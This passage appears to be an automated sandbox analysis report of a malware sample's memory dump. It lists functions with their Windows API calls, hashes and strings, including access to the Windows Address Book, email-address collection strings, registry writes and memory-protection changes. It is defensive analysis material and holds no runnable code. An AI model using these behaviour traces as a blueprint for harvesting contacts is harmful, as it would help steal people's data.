API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: bf4955fdd0e661fb8e3c41a3f25c73c70d60bfcc2b884a6ff3ade6078db77a95
Instruction ID: 14bf14178537be4dd2bab8327cde936cb1bdf96b901a52fb2d02f12b17948cd3
Opcode Fuzzy Hash: bf4955fdd0e661fb8e3c41a3f25c73c70d60bfcc2b884a6ff3ade6078db77a95
Instruction Fuzzy Hash: D6318532904609DFCB21EF68D94492AB7F5FB45765F448AAAF599C3250C730D821CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 02B77365, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,76D25520,?,?,02B81386,00000000,?,?), ref: 02B77383
GetFileSize.KERNEL32(00000000,00000000,?,?,02B81386,00000000,?,?,?,?,00000000,02B71589,?,00000000,?,02B85B4A), ref: 02B77393
ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,02B81386,00000000,?,?,?,?,00000000,02B71589), ref: 02B773BF
GetLastError.KERNEL32(?,?,02B81386,00000000,?,?,?,?,00000000,02B71589,?,00000000,?,02B85B4A,?,00000001), ref: 02B773E4
CloseHandle.KERNEL32(000000FF,?,?,02B81386,00000000,?,?,?,?,00000000,02B71589,?,00000000,?,02B85B4A,?), ref: 02B773F5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: e8e0dc997724ac071b4bbb50722646e8bcc4b1d9fb5fd2ebf8a1f70389918f54
Instruction ID: d59175a9ba0c1bdb9650f003124754384a73dc2ad2cf6da8718bf12135d6bf8b
Opcode Fuzzy Hash: e8e0dc997724ac071b4bbb50722646e8bcc4b1d9fb5fd2ebf8a1f70389918f54
Instruction Fuzzy Hash: F411E472580215FFDB201F64DCC4EAEBA6DDB053A4F0286AAFD25A7140DBB08C41D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 02B917F1, Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,64F16420,64F16420,?,02B7B0C6,?,?,?,00000000,?,?,00000001), ref: 02B91802
StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,64F16420,64F16420,?,02B7B0C6,?,?,?,00000000,?,?,00000001), ref: 02B9181B
StrTrimA.SHLWAPI(?,20000920,?,00000000,64F16420,64F16420,?,02B7B0C6,?,?,?,00000000,?,?,00000001,00000000), ref: 02B91843
StrTrimA.SHLWAPI(00000000,20000920,?,00000000,64F16420,64F16420,?,02B7B0C6,?,?,?,00000000,?,?,00000001,00000000), ref: 02B91852
HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,64F16420,64F16420,?,02B7B0C6,?,?,?), ref: 02B91889

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Trim$FreeHeap
String ID:
API String ID: 2132463267-0
Opcode ID: 0887555d3b18ad772fef0f928f2729d7b9b41bae2f523ebc00974abfc0fd42ba
Instruction ID: da46b282c0b769bc53835a51bc9485e3f3875f3d36d1b6c83089c5ab34b53d47
Opcode Fuzzy Hash: 0887555d3b18ad772fef0f928f2729d7b9b41bae2f523ebc00974abfc0fd42ba
Instruction Fuzzy Hash: B1118132650206BBEB11AB5DDD85FAB3BADEB056D4F050471FA0897140DBA0E911EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8FD52, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,?,00000000,?,?,00000000,00000000,?,02B7A4D6,00000000,02B7585F,00000000,02B9DEAC,00000008), ref: 02B8FD89
VirtualProtect.KERNEL32(00000000,00000004,?,?,?,02B7A4D6,00000000,02B7585F,00000000,02B9DEAC,00000008,00000003), ref: 02B8FDB9
RtlEnterCriticalSection.NTDLL(02B9E240), ref: 02B8FDC8
RtlLeaveCriticalSection.NTDLL(02B9E240), ref: 02B8FDE6
GetLastError.KERNEL32(?,02B7A4D6,00000000,02B7585F,00000000,02B9DEAC,00000008,00000003), ref: 02B8FDF6

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: de41524398e8f9887add162fcdaff505548f50f359531d03fc57c9d9bf8373da
Instruction ID: 1f2eb2464c3a50282993da72614754976c9e1bb4eaba1d096fadfa321ef8cbeb
Opcode Fuzzy Hash: de41524398e8f9887add162fcdaff505548f50f359531d03fc57c9d9bf8373da
Instruction Fuzzy Hash: BB21F8B5A00701AFD710DFA8C98095ABBF8FB093107008A6AEA5997710E770E914CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B834B4, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 02B834E2
GetLastError.KERNEL32 ref: 02B83505
WaitForSingleObject.KERNEL32(?,000000FF), ref: 02B83518
GetLastError.KERNEL32 ref: 02B83523
HeapFree.KERNEL32(00000000,00000000), ref: 02B8356B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: ed19a615680cbabbbaea824decccf13c23e513d64a7ee581f274e5079038f232
Instruction ID: 2fe125b8e5a7b04addc6c9369807e3b27c96b0149d17f95f7b013e32dbb8bb5e
Opcode Fuzzy Hash: ed19a615680cbabbbaea824decccf13c23e513d64a7ee581f274e5079038f232
Instruction Fuzzy Hash: 3E21F070900244EBEB20AF64D98DB9E7BF8FB01B58F2009E8F14A921E1C371ED94CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02B73F5D, Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000057,02B720D2), ref: 02B73F71
memcpy.NTDLL(00000000,?,02B720D2,02B720D2,-00000005,?,02B7488A,Scr,00000000,-00000005,00000001,?,?,?,02B76516,00000000), ref: 02B73F9A
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,02B720D2), ref: 02B73FC3
RegSetValueExA.ADVAPI32(02B720D2,?,00000000,00000003,00000000,00000000,-00000005,?,02B7488A,Scr,00000000,-00000005,00000001), ref: 02B73FE3
RegCloseKey.ADVAPI32(02B720D2,?,02B7488A,Scr,00000000,-00000005,00000001,?,?,?,02B76516,00000000,Scr,?,?,76D7F710), ref: 02B73FEE

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Value$AllocateCloseCreateHeapmemcpy
String ID:
API String ID: 2954810647-0
Opcode ID: 3ef5e3e091d6d93e84b79732588d90fb327559e309848062a1b0b751f91a39eb
Instruction ID: 256fef62cec30bcf5ca811f312952492074497c3b2f04c753f14649e9ab59272
Opcode Fuzzy Hash: 3ef5e3e091d6d93e84b79732588d90fb327559e309848062a1b0b751f91a39eb
Instruction Fuzzy Hash: AD119E7264010ABFDF116F64ED44EAAB6BEEB44380F0404A5FE15A6190D7728D20EB61

Uniqueness

Uniqueness Score: -1.00%

Function 02B7DD8D, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(02B86602,?,?,?,?,00000008,02B86602,00000000,?), ref: 02B7DDAA
memcpy.NTDLL(02B86602,?,00000009,?,?,?,?,00000008,02B86602,00000000,?), ref: 02B7DDCC
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 02B7DDE4
lstrlenW.KERNEL32(00000000,00000001,02B86602,?,?,?,?,?,?,?,00000008,02B86602,00000000,?), ref: 02B7DE04
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,02B86602,00000000,?), ref: 02B7DE29

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: 8b2447eb539eed345d7899602baa320f0d2e326bee7f204c7cd1e5751946015c
Instruction ID: efc004b44800a079d77955c39db4f462e301ad4dc1995430ce6376bd2f3a2238
Opcode Fuzzy Hash: 8b2447eb539eed345d7899602baa320f0d2e326bee7f204c7cd1e5751946015c
Instruction Fuzzy Hash: 09116376D41209BBCB11ABA5DC49FDE7BB8AF09390F004491F919D7280D770D619DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8ECB1, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,02B96C86,76D25520,02B74BBD,?,?,?,02B715E5,?,?,00000000,?,02B85B4A,?,00000001), ref: 02B8ECBB

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

lstrcpy.KERNEL32(00000000,?), ref: 02B8ECDF
StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,02B715E5,?,?,00000000,?,02B85B4A,?,00000001), ref: 02B8ECE6
lstrcpy.KERNEL32(00000000,4C003436), ref: 02B8ED2E
lstrcat.KERNEL32(00000000,00000001), ref: 02B8ED3D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$AllocateHeaplstrcatlstrlen
String ID:
API String ID: 2616531654-0
Opcode ID: 7dfc3faebc5f42eef72053349278d10f6d75045ae8f4a0faaa048b64c086bf48
Instruction ID: 410ed8539feae9d83bc8be0972e0adcb14856e47d188c502cca8a80f45d2c31e
Opcode Fuzzy Hash: 7dfc3faebc5f42eef72053349278d10f6d75045ae8f4a0faaa048b64c086bf48
Instruction Fuzzy Hash: C111C632644202ABD720EB69DD88F6B7BECEF85684F090969F60DC7100E730D548C771

Uniqueness

Uniqueness Score: -1.00%

Function 02B7AA89, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7C71D: lstrlen.KERNEL32(00000000,00000000,?,76D25520,02B882A5,00000000,00000000,00000000,76D25520,?,00000022,00000000,00000000,00000000,?,?), ref: 02B7C729

RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02B7AAB2
memcpy.NTDLL(00000000,?,?), ref: 02B7AAC5
RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B7AAD6
RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B7AAEB
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 02B7AB23

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: 0fe0bfa042a9a52ee28135fa589a7749a6426dac426e14eb602978653b6ae15a
Instruction ID: e4fe49bd652f10a4a8f40920d38e5b2c82bf883b86b490739e8858d675f856d2
Opcode Fuzzy Hash: 0fe0bfa042a9a52ee28135fa589a7749a6426dac426e14eb602978653b6ae15a
Instruction Fuzzy Hash: FC110876945210EFC7116F24DC84D2B7B69FB863617010ABFF86593240C7319C21CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B8FE0E, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 02B8FE2E
GetModuleHandleA.KERNEL32 ref: 02B8FE3C
LoadLibraryExW.KERNEL32(?,?,?), ref: 02B8FE49
GetModuleHandleA.KERNEL32 ref: 02B8FE60
GetModuleHandleA.KERNEL32 ref: 02B8FE6C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$LibraryLoad
String ID:
API String ID: 1178273743-0
Opcode ID: 027f162607ff23b88625694fd1c5bfccf8ffb87eb9475051f3484de7230bdd55
Instruction ID: ef74997eddd488c631d550067b30070f1c233b04e374a9176af5c5525e06d605
Opcode Fuzzy Hash: 027f162607ff23b88625694fd1c5bfccf8ffb87eb9475051f3484de7230bdd55
Instruction Fuzzy Hash: 1E016232A41216DBDF016F7AED40A667BA9EB142A13440576E91CC2161DBB1DC21CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B82AC4, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02B9E240), ref: 02B82ACF
RtlLeaveCriticalSection.NTDLL(02B9E240), ref: 02B82AE0
VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,02B80AA0,02B9D7A0,76D257B0,00000000,02B81E50,0000000C,00000000,?,0000000C,00000000), ref: 02B82AF7
VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,02B80AA0,02B9D7A0,76D257B0,00000000,02B81E50,0000000C,00000000,?,0000000C,00000000), ref: 02B82B11
GetLastError.KERNEL32(?,?,02B80AA0,02B9D7A0,76D257B0,00000000,02B81E50,0000000C,00000000,?,0000000C,00000000,WININET.dll), ref: 02B82B1E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: fb06daa9a516d179663795b0b9715e502ae9581b908fcfdc45de8f4ccdb9ba9b
Instruction ID: 746b463477a54856396e65c78950b47d77dfcd77c2618e6a6d9e7ae8293dfe71
Opcode Fuzzy Hash: fb06daa9a516d179663795b0b9715e502ae9581b908fcfdc45de8f4ccdb9ba9b
Instruction Fuzzy Hash: 4E01AD75600304EFD7219F25CC00E6AB7F9FF85360B108969EA4A93350D770E901CF20

Uniqueness

Uniqueness Score: -1.00%

Function 02B84E2B, Relevance: 7.5, APIs: 5, Instructions: 39synchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B851FB: InterlockedExchange.KERNEL32(00000002,000000FF), ref: 02B85202

GetCurrentThreadId.KERNEL32 ref: 02B84E43
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02B84E53
CloseHandle.KERNEL32(00000000), ref: 02B84E5C
VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,000000FF,000000FF,02B90B37), ref: 02B84E7A
VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,000000FF,000000FF,02B90B37), ref: 02B84E87

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual$CloseCurrentExchangeHandleInterlockedObjectSingleThreadWait
String ID:
API String ID: 2588964033-0
Opcode ID: f515caef59d24bf2f396db148416afb906f06e365adc02db380741367eca1589
Instruction ID: 62ab5b4bbc5e68f1401f87dca7fd8af2a00b9dd108e8d356c0a7c515abd4b822
Opcode Fuzzy Hash: f515caef59d24bf2f396db148416afb906f06e365adc02db380741367eca1589
Instruction Fuzzy Hash: A9F03772600B01ABDA30BA75DD48B17B3FDFF49755F010A69E689925A0DB34E854CA20

Uniqueness

Uniqueness Score: -1.00%

Function 02B88B88, Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02B7A08D,?), ref: 02B88B90
GetVersion.KERNEL32 ref: 02B88B9F
GetCurrentProcessId.KERNEL32 ref: 02B88BAE
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02B88BCB
GetLastError.KERNEL32 ref: 02B88BEA

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 685e1086d98263856ead432a4d4e1200c3dfdf5d0f107711f7c864043a3ccbe9
Instruction ID: 49db4196a4083cc353b806bb64513abb398e0ff41b3b8908f5f1de627f507a2d
Opcode Fuzzy Hash: 685e1086d98263856ead432a4d4e1200c3dfdf5d0f107711f7c864043a3ccbe9
Instruction Fuzzy Hash: B9F0F4B0EC4309EFE760DF34AA0AB153BA5A745781F514E1AE51AC71C0D77180A0CB29

Uniqueness

Uniqueness Score: -1.00%

Function 02B82692, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,?,?,?,?), ref: 02B82775
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,02B75E99), ref: 02B827E7
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02B827F8

Part of subcall function 02B80158: RtlLeaveCriticalSection.NTDLL(?), ref: 02B801D5

Strings

HTTP/1.1 404 Not Found, xrefs: 02B8276D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalFreeLeaveSectionmemcpy
String ID: HTTP/1.1 404 Not Found
API String ID: 4231733408-2072751538
Opcode ID: a2140b8ce446317bc1c7c81175f657100c5879d58fb14ffb67773e342a35f5bb
Instruction ID: 512abd842ed20bb462654f05a07169515d8ff1cfc623f45058d1a04e34111eb0
Opcode Fuzzy Hash: a2140b8ce446317bc1c7c81175f657100c5879d58fb14ffb67773e342a35f5bb
Instruction Fuzzy Hash: 76617074600646FFEF11AF65CA84BA5B7A5FF08344F0044A9ED0D96A50E771E930CF80

Uniqueness

Uniqueness Score: -1.00%

Function 02B791C1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

Email, xrefs: 02B79217, 02B79224

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: Email
API String ID: 1279760036-642995056
Opcode ID: 9a6d6f66079d791a20db452503d038f9a6e5baa80f079f093f6932f1252987b3
Instruction ID: 4dc0ee367e643e94b8227452a2819ad15817010d1f3e15a530157b173d172e21
Opcode Fuzzy Hash: 9a6d6f66079d791a20db452503d038f9a6e5baa80f079f093f6932f1252987b3
Instruction Fuzzy Hash: 7531ADB1508309BFEB11AF51DC84D6FBFADFB94394F00086DFAA591060C7318964DB62

Uniqueness

Uniqueness Score: -1.00%

Function 02B7CD69, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74synchronizationCOMMON

Download Yara Rule

APIs

RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 02B7CD9D
RtlFreeAnsiString.NTDLL(?), ref: 02B7CE1D
WaitForSingleObject.KERNEL32(00000000), ref: 02B7CE2A

Strings

?@, xrefs: 02B7CE05

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: String$AnsiFreeObjectSingleUnicodeUpcaseWait
String ID: ?@
API String ID: 2603241602-3895805154
Opcode ID: a73c2af8a1ad3a245d4363ec7a1a9dfd8ef172599f3f17e67f565dfe29a68c17
Instruction ID: bb06f2a2f5a6ba54caf6f7ece755b6770c202e9783a95d62cac60bc7cc2654d5
Opcode Fuzzy Hash: a73c2af8a1ad3a245d4363ec7a1a9dfd8ef172599f3f17e67f565dfe29a68c17
Instruction Fuzzy Hash: 4B210576504604ABC714DF65D88886ABBAAFB44314F144CAFF966C3150D730F8E48BE3

Uniqueness

Uniqueness Score: -1.00%

Function 02B78247, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 02B782D1
HeapFree.KERNEL32(00000000,?), ref: 02B782E2
HeapFree.KERNEL32(00000000,?), ref: 02B782FA
CloseHandle.KERNEL32(?), ref: 02B78314
HeapFree.KERNEL32(00000000,?), ref: 02B78329

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: e564b593541e9a8675025839fec5b02a7442475808a08eb5455d2bb4f432a33d
Instruction ID: 1d78c1d0c702a2c096bfdf882d3fba600fa8efc92a6059ca58b03c9148c1edc9
Opcode Fuzzy Hash: e564b593541e9a8675025839fec5b02a7442475808a08eb5455d2bb4f432a33d
Instruction Fuzzy Hash: 84318830601922AFC711AF6ADC88D2AFBBAFF59B153544984F458D7624C731ECA1DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7880D, Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 02B8FC77: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 02B8FC92
Part of subcall function 02B8FC77: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 02B8FCE0
Part of subcall function 02B8FC77: GetProcAddress.KERNEL32(00000000,WABOpen), ref: 02B8FCF2
Part of subcall function 02B8FC77: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 02B8FD43

GetLastError.KERNEL32(?,?,00000001), ref: 02B7899B
FreeLibrary.KERNEL32(?,?,00000001), ref: 02B78A03

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: 80c0de04f5e26badfb2820f9ddfbf0fa9f6fb13d691d746f064d1635b264302b
Instruction ID: be22305a9b47e2cf633980c5d12639e554f8126aef0e344e02b55486b1ba52a9
Opcode Fuzzy Hash: 80c0de04f5e26badfb2820f9ddfbf0fa9f6fb13d691d746f064d1635b264302b
Instruction Fuzzy Hash: C4711A71E00209EFCF00DFE5C8889AEBBB9FF49308B1495A9E625E7250D735A941DF61

Uniqueness

Uniqueness Score: -1.00%

Function 02B74065, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02B74112
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02B74128
memset.NTDLL ref: 02B741C8
memset.NTDLL ref: 02B741D8

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 89ee2b31ca21d117f874871ab38b26b95b86b706043730b33587d22d84227cd5
Instruction ID: 5206c5ed44cfa3ba215d6fffeb837a1e54d63f6b7505ff99ce7c9303f07bbf18
Opcode Fuzzy Hash: 89ee2b31ca21d117f874871ab38b26b95b86b706043730b33587d22d84227cd5
Instruction Fuzzy Hash: 8C418171A00259AFDF10EFA8DC40BEE7BB9EF54310F1085A9F929AB180EB709955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B95B53, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(02B9839C,02B9837C,?,00000008), ref: 02B95C93

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

Part of subcall function 02B878AB: lstrlenW.KERNEL32(?,00000000,?,?,00000000,02B7FFD9,00000000), ref: 02B878BC
Part of subcall function 02B878AB: lstrlenW.KERNEL32(02B9A4C8,00000000,?,00000000,02B7FFD9,00000000), ref: 02B878D3

Strings

EmailAddressCollection/EmailAddress[%u]/Address, xrefs: 02B95C16
1.0, xrefs: 02B95B7D
A8000A, xrefs: 02B95B82

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateErrorHeapLast
String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address
API String ID: 3415590935-2884085418
Opcode ID: ab8beb2a865733702c707e8c78da50ec0f41989ff4097ab2e900bb6e4cf78c7f
Instruction ID: 187335928fcb647c279fb38920652592035378cfe1015d22317d64ff430c6d3c
Opcode Fuzzy Hash: ab8beb2a865733702c707e8c78da50ec0f41989ff4097ab2e900bb6e4cf78c7f
Instruction Fuzzy Hash: 8E413074A40205AFDF11EFA4C988E6EB7B9EF49704B5444A8F905EB251DB71EA01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B81395, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02B814B5

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

GetLastError.KERNEL32 ref: 02B81429
WaitForSingleObject.KERNEL32(00000000), ref: 02B81439
GetLastError.KERNEL32 ref: 02B81459

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 2a000425284019347d4d4bb64f44f8ad50c6a85f18fec5f267857408596aecc9
Instruction ID: 3eaee8279733c63cf750801bc547edee0295f3318e9d5b45f384f44f9bc6d6ad
Opcode Fuzzy Hash: 2a000425284019347d4d4bb64f44f8ad50c6a85f18fec5f267857408596aecc9
Instruction Fuzzy Hash: 16411EB0D11209EFDF10EFA9D984AADBBB9FF04384B1848A9E50EE7150D7709A45DF21

Uniqueness

Uniqueness Score: -1.00%

Function 02B718E3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B806E2: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B80714
Part of subcall function 02B806E2: HeapFree.KERNEL32(00000000,00000000,?,?,02B81F8A,?,00000022,00000000,00000000,00000000,?,?), ref: 02B80739

HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B7199D
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B719BD
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 02B719C9

Strings

https://, xrefs: 02B71913

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate
String ID: https://
API String ID: 3472947110-4275131719
Opcode ID: c460f83f7db99059b0a84770760ba5e93f5c5308fd7cec3cf6440ac3772012d8
Instruction ID: fdbb466a579e69d83219bf34d7c8bd542e72334c22a23c50c45056c134beecf1
Opcode Fuzzy Hash: c460f83f7db99059b0a84770760ba5e93f5c5308fd7cec3cf6440ac3772012d8
Instruction Fuzzy Hash: 8621A131811218BBCF22AF65CC84EAE7F76EF41794F1084A5FA0866060C7718A92DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B80BB6, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 02B80BE5
SetEvent.KERNEL32(?), ref: 02B80C2F
TlsSetValue.KERNEL32(00000001), ref: 02B80C69
TlsSetValue.KERNEL32(00000000), ref: 02B80C85

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: 6a407306f245cf2d6118d84d687484c7763966760af652a42f9caa6908575c98
Instruction ID: e709b575b52adf0791fdaa29154bf0dbf4ef6c0b11d860f2e704213a72b3497e
Opcode Fuzzy Hash: 6a407306f245cf2d6118d84d687484c7763966760af652a42f9caa6908575c98
Instruction Fuzzy Hash: 4D21A131100205EFDB61BF29DD85A6A7BA2FF41394B140D69FA19DA1A0C371DCA9DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B8CC46, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B8CC9F
memcpy.NTDLL(00000018,?,?), ref: 02B8CCC8
RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0001292A,00000000,000000FF,00000008), ref: 02B8CD07
HeapFree.KERNEL32(00000000,00000000), ref: 02B8CD1A

